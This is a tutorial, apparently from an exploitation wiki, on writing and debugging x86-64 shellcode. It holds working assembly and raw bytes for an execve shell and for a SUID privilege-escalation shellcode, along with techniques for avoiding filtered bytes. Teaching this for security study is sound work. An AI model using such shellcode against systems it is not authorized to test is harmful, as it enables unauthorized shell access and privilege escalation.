Shellcode

Writing and debugging your own shellcode

When you have found a buffer overflow or any other way to jump to your input a common exploitation method is to write shellcode. With shellcode, you write data in the form of assembly instructions so that any code you have written will be executed when the program jumps to it.

Shellcode is called "shellcode" because you often write code that gives you an interactive shell. This can be done using the execve("/bin/sh", NULL, NULL) syscall to spawn an sh shell with no arguments or environment variables. There are existing shellcodes people have created for various different architectures and use cases, like the following database:

Big collection of shellcodes make by different people, for many architectures and use cases

While these are often enough, in some cases, you will need to write your own custom shellcode that does exactly what you need. There are many different ways of writing shellcode because it simply involves extracting the bytes as machine code from an existing program.

To have the most control and shortest shellcode, it is recommended to write them in assembly, but in theory, you could just as well write it in C and later extract the assembly from it after compiling.

Simple example

We can write a simple execve(pathname, argv[], envp[]) syscall like explained above in assembly. We first need to know the correct syscall number, to choose execve. Then set the arguments, which in x64 are in order rdi, rsi, rdx. The first is the most important, as the file to execute. This will be "/bin/sh" in our case, but as it is a char* type it need to be a pointer to that string. Since we control the shellcode, we can simply include that string in it and reference it relatively from the rip register as that will be in the middle of our shellcode as we are executing it. The whole thing looks something like this:

shellcode.s
.global _start
_start:
.intel_syntax noprefix
        mov rax, 59           ; choose which syscall: execve (see x64.syscall.sh)
        lea rdi, [rip+binsh]  ; set a *pointer* to the /bin/sh string as 1st argument
        mov rsi, 0            ; set 2nd argument (argv[]) to NULL
        mov rdx, 0            ; set 3rd argument (envp[]) to NULL
        syscall               ; perform the syscall we set up
binsh:
        .string "/bin/sh"     ; include the string we referenced

Now that we have the assembly code, we'll need to compile it, and later extract the raw shellcode bytes from that compiled binary. First compile it to a runnable ELF file:

$ gcc -nostdlib -static shellcode.s -o shellcode-elf
$ ./shellcode-elf

This will create a shellcode-elf file that you can run to test out your shellcode, and debug it if something goes wrong. If it seems to work correctly, like giving you a shell in this example, you can extract the .text section which contains the code we wrote, but this time as raw bytes from the binary:

$ objcopy --dump-section .text=shellcode-raw shellcode-elf
$ hd shellcode-raw  # hexdump
00000000  48 c7 c0 3b 00 00 00 48  8d 3d 10 00 00 00 48 c7  |H..;...H.=....H.|
00000010  c6 00 00 00 00 48 c7 c2  00 00 00 00 0f 05 2f 62  |.....H......../b|
00000020  69 6e 2f 73 68 00                                 |in/sh.|
00000026

After that, you will have your shellcode in a shellcode-raw file that you can include in your payload.

Debugging shellcode

When the shellcode you created doesn't seem to work correctly, you need to debug it. It's probably some simple mistake because assembly is hard, but you just need to understand what is happening. To get a high-level overview of the syscalls you are executing, running strace is a good option. It runs your program and at the same time will print which syscalls are executed and their return values. For example:

$ strace ./shellcode-elf
execve("./shellcode-elf", ["./shellcode-elf"], 0x7ffdf115bb40 /* 41 vars */) = 0
execve("/bin/wrong", NULL, NULL)        = -1 ENOENT (No such file or directory)
--- SIGILL {si_signo=SIGILL, si_code=ILL_ILLOPN, si_addr=0x40101e} ---
+++ killed by SIGILL +++
Illegal instruction

This method is more useful if you have a combination of multiple syscalls where you want to see the intermediate results. For more detailed analysis like stepping through individual instructions, you can use a real debugger like GDB. Simply run the shellcode in GDB and you can break at the first instruction using the starti command. Here we can examine the next instructions, the state of registers, look at the stack, and much more.

(gdb) starti
Program stopped.
0x0000000000401000 in _start ()
(gdb) x/5i $rip
=> 0x401000 <_start>:      mov    $0x3b,%rax
   0x401007 <_start+7>:    lea    0x10(%rip),%rdi        # 0x40101e <binsh>
   0x40100e <_start+14>:   mov    $0x0,%rsi
   0x401015 <_start+21>:   mov    $0x0,%rdx
   0x40101c <_start+28>:   syscall
(gdb) ni
0x0000000000401007 in _start ()
(gdb) x/5i $rip
=> 0x401007 <_start+7>:    lea    0x10(%rip),%rdi        # 0x40101e <binsh>
   0x40100e <_start+14>:   mov    $0x0,%rsi
   0x401015 <_start+21>:   mov    $0x0,%rdx
   0x40101c <_start+28>:   syscall
   0x40101e <binsh>:       (bad)

In case your shellcode works alone, but not inside your exploit, you can also add a debugger to the exploited binary to step through everything in a different context, which might reveal differences. An easy way to set a breakpoint at the start of your payload is to include the int3 instruction, which triggers a trace/breakpoint trap in any debugger. You can manually add the \xcc byte it translates to, or simply include the int3 in your assembly source code before compiling (see this video for a full explanation):

(gdb) run
Program received signal SIGTRAP, Trace/breakpoint trap.
0x0000000000401001 in _start ()
(gdb) x/5i $rip
=> 0x401001 <_start+1>:    mov    $0x3b,%rax
   0x401008 <_start+8>:    lea    0x10(%rip),%rdi        # 0x40101f <binsh>
   0x40100f <_start+15>:   mov    $0x0,%rsi
   0x401016 <_start+22>:   mov    $0x0,%rdx
   0x40101d <_start+29>:   syscall

Exploiting SUID binaries

While the shellcode above gives you an interactive sh shell, you might find yourself requiring something more. If you are exploiting a SUID binary where your privileges are elevated, often the goal is to become that user, instead of only spawning a shell as yourself. By default, spawning an execve shell as above using a SUID binary will not give you the permissions of that user, but instead, take yours. Look at the following example:

root@machine $ chown root:root shellcode-elf
root@machine $ chmod +s shellcode-elf
user@machine $ ls -l shellcode-elf
-rwsr-sr-x 1 root root 4784 May 28 11:11 shellcode-elf
user@machine $ ./shellcode-elf
$ id
uid=1001(user) gid=1001(user) groups=1001(user)

This can be unintuitive because the program should execute as root because of the s bit we set in the permissions. However, when we execute the shellcode we are still the same low-privilege user. This is because the setuid bit is only allowing the program to elevate its permissions. We just have to perform this elevation still using the setreuid (user) and setregid (group) syscalls to take over this user. Both of these syscalls take in two arguments as the "real" and "effective" IDs. We can hardcode all these to 0 to try and elevate to root if the SUID binary is executed as root, but in some cases, it will be owned by a different user or group ID.

To make a generic method for this, we can request the current effective IDs and set the real IDs to that value. This will basically be the following two syscalls:

setreuid(geteuid(), geteuid());
setregid(getegid(), getegid());

It will set both the user and group to the executing user allowing you to elevate from any SUID binary to any user, not just root. In assembly, these syscalls would look like this:

shellcode-suid.s
.global _start
_start:
.intel_syntax noprefix
geteuid:
        mov rax, 107
        syscall
setreuid:
        mov rdi, rax  ; result from geteuid()
        mov rsi, rax  ; result from geteuid()
        mov rax, 113
        syscall       ; setreuid(geteuid(), geteuid())
getegid:
        mov rax, 108
        syscall
setregid:
        mov rdi, rax  ; result from getegid()
        mov rsi, rax  ; result from geteuid()
        mov rax, 114
        syscall       ; setregid(getegid(), getegid()
execve:
        mov rax, 59
        lea rdi, [rip+binsh]
        mov rsi, 0
        mov rdx, 0
        syscall       ; execute "/bin/sh" now that UID and GID are set
binsh:
        .string "/bin/sh"

Compiling this shellcode instead, we can see the permissions are correctly transferred over:

admin@machine $ gcc -nostdlib -static shellcode-suid.s -o shellcode-suid-elf
admin@machine $ chmod +s shellcode-suid-elf
user@machine $ id
uid=1001(user) gid=1001(user) groups=1001(user)
user@machine $ ./shellcode-elf
$ id
uid=1000(admin) gid=1000(admin) groups=1000(admin),1001(user)

Filter Bypass (badchars)

Pretty often, you are limited in your input and thus what shellcode you can provide. Some characters or patterns might be interpreted differently from other characters making the choice of what bytes to use in your shellcode important. Common examples are #0-null-bytes, which are often used to end a string, and \n newlines (and others) that might be the end of input.

Below is a table of problematic bytes in common builtin functions (source):

Byte
Problematic Functions

0x00: Null byte (\0)

strcpy

0x0a: Newline (\n)

scanf gets getline fgets

0x0d: Carriage return (\r)

scanf

0x20: Space ( )

scanf

0x09: Tab (\t)

scanf

0x7f: DEL

protocol-specific (telnet, VT100, etc.)

\n newlines (and others)

When you provide shellcode, often this is done via a command-line input. Many functions that accept user input via STDIN will wait until it is completed with a \n. This means that if you send a newline inside of your payload prematurely, it will end your input and not copy the full shellcode.

The byte value of a newline is 0x0a, or 10 in decimal. If you want to set a value of 10 with a mov instruction into a register, for example, it might encode to 0x0a breaking the payload.

In this case, the easiest solution is often to choose a slightly smaller or larger value that still serves the same purpose. Sometimes you do need exactly 10 though, but then simply set it to a different value first, and change it with another instruction right after. For example:

mov rax, 10    ; 64-bit syscall for mprotect()
--------------------
48 c7 c0 0a 00 00 00
         ^^ problem

We can fix this, by first setting rax to 9, and then incrementing it by one to get the same result:

mov rax, 9    ; rax = 9
inc rax       ; rax = 9+1 = 10
------------------
48 c7 c0 09 00 00 00 48 ff c0
         ^^ safe

In the same way, many more small tricks like this exist. Like using add, sub, xor or and. It is a matter of being creative in getting values in the right place.

\0 null bytes

A very common bad char that you will encounter is the null byte, 0x00. This 0 value is so commonly needed that there are some specific tricks to set zero values.

Firstly, simply clearing a register:

xor rax, rax    ; xor'ing a register with itself will flip all the bits back to 0
--------
48 31 c0

sub rax, rax    ; subtract from itself, leaving 0
--------
48 29 c0

When setting other registers the instructions also often contain leading zeros to set a 64-bit value to 10 for example. In most cases, you can eliminate these leading zeros by simply using a 32-, 16-, or 8-bit value depending on the size of your value. In a previous example, we were setting rax to 10, but to make sure higher bits also are set back to 0 we needed to use a full 64-bit value in the assembled instruction (look at all the null bytes).

To solve this, we'll set the 8-bit al register instead (see Registers for more info):

xor rax, rax   ; rax may contain anything, so clear everything first
mov al, 10     ; set the last 8 bits to 10
----------------
48 31 c0 b0 0a
            ^^ no nulls

Lastly, you might need zero-delimited strings that don't perfectly align with the 64, 32, 16, or 8 bits we did previously.

In these cases, either make the string aligned with these boundaries, intentionally ending the payload with the required null byte, or use shifts to get the exact string. Let's say we want the little-endian "/bin/sh" string into the rdi register:

Align with bits
mov rdi, 0x68732f2f6e69622f  ; "/bin//sh", still works as path, but exactly 64 bits
-----------------------------
48 bf 2f 62 69 6e 2f 2f 73 68
Bitshifting
mov rdi, 0x68732f6e69622fff  ; "//bin/sh"
shr rdi, 0x8                 ; shift right 8 bits to make "/bin/sh"
End with null
_start:
        jmp binsh       ; create a pointer on stack to "/bin/sh"
back:
        pop rdi         ; take address from stack
        mov rdi, [rdi]  ; dereference pointer to get raw value
        ...
binsh:
        call back       ; pushes next instruction ("/bin/sh")
        .string "/bin/sh"

Last updated